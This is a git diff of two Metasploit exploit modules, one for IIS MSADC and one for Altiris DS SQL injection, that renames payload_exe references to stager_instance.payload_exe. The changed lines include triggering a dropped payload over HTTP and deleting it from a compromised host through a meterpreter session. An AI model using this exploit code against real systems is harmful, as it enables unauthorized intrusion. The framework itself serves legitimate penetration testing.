diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 359c24fdf7..de5f2e17b7 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -332,12 +332,12 @@ class Metasploit3 < Msf::Exploit::Remote # Save these file names for later deletion @exe_cmd_copy = exe_fname - @exe_payload = payload_exe + @exe_payload = stager_instance.payload_exe # Grab this info from CmdStagerTFTP # Just for good measure, we'll make a quick, direct request for the payload # Using the "start" method doesn't seem to make iis very happy :( print_status("Triggering the payload via a direct request...") - res = send_request_raw({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1) + res = send_request_raw({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1) end handler diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 1bff0c4af0..78668cff09 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -163,7 +163,7 @@ Processor-Speed=#{processor_speed} end def on_new_session(client) - return if not payload_exe + return if not stager_instance.payload_exe #can't scrub dropped payload while the process is still active so... #iterate through process list, find our process and the associated @@ -174,7 +174,7 @@ Processor-Speed=#{processor_speed} #SeeRM#8365 https://http://dev.metasploit.com/redmine/issues/8365 unless client.type == "meterpreter" - print_error("Automatic cleanup only available with meterpreter, please delete #{payload_exe} manually") + print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually") return end @@ -191,7 +191,7 @@ Processor-Speed=#{processor_speed} end win_temp = client.sys.config.getenv('TEMP') - win_file = "#{win_temp}\\#{payload_exe}" + win_file = "#{win_temp}\\#{stager_instance.payload_exe}" print_status("Attempting to delete #{win_file} ...") client.shell_command_token(%Q|attrib.exe -r #{win_file}|) client.fs.file.rm(win_file)